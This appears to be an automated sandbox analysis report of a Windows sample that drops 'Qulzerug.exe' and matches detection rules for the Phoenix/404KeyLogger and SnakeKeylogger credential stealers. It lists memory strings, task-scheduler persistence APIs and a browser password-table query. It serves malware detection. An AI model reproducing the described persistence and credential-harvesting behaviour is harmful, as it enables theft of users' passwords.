Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D4B10	13_2_068D4B10
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D8880	13_2_068D8880
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D3988	13_2_068D3988
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D99F0	13_2_068D99F0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D9148	13_2_068D9148
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D76E8	13_2_068D76E8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DB6E1	13_2_068DB6E1
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D6E20	13_2_068D6E20
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DAE23	13_2_068DAE23
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D2637	13_2_068D2637
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D7FB0	13_2_068D7FB0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D2F03	13_2_068D2F03
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D2F10	13_2_068D2F10
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D1C99	13_2_068D1C99
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D5C90	13_2_068D5C90
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D1CA8	13_2_068D1CA8
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D0DA1	13_2_068D0DA1
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D6558	13_2_068D6558
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DA2AB	13_2_068DA2AB
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D4AFF	13_2_068D4AFF
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068DD24A	13_2_068DD24A
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D4240	13_2_068D4240
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D53CB	13_2_068D53CB
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D886F	13_2_068D886F
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D99E0	13_2_068D99E0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D9138	13_2_068D9138
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_068D3977	13_2_068D3977
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_0696AA30	13_2_0696AA30
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_0696DCB0	13_2_0696DCB0
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_06960040	13_2_06960040
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	Code function: 13_2_06960006	13_2_06960006

Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamek.exe$ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLxkfkqeij.dll" vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000000.1242378149.0000000000592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWzkyuqq.exe0 vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWzkyuqq.exe0 vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamek.exe$ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLxkfkqeij.dll" vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1287144477.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe, 00000008.00000002.2496879435.0000000000DA7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 6Ek4nfs2y1.exe
Source: 6Ek4nfs2y1.exe	Binary or memory string: OriginalFilenameWzkyuqq.exe0 vs 6Ek4nfs2y1.exe

Source: 6Ek4nfs2y1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.Qulzerug.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR	Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
Source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/4@2/2

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

File created: C:\Users\user\AppData\Roaming\Qulzerug.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Qulzerug.exe

Mutant created: NULL

Source: 6Ek4nfs2y1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 6Ek4nfs2y1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Qulzerug.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000003090000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.000000000309E000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 6Ek4nfs2y1.exe

ReversingLabs: Detection: 70%

Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe

File read: C:\Users\user\Desktop\6Ek4nfs2y1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"
Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe	Process created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"
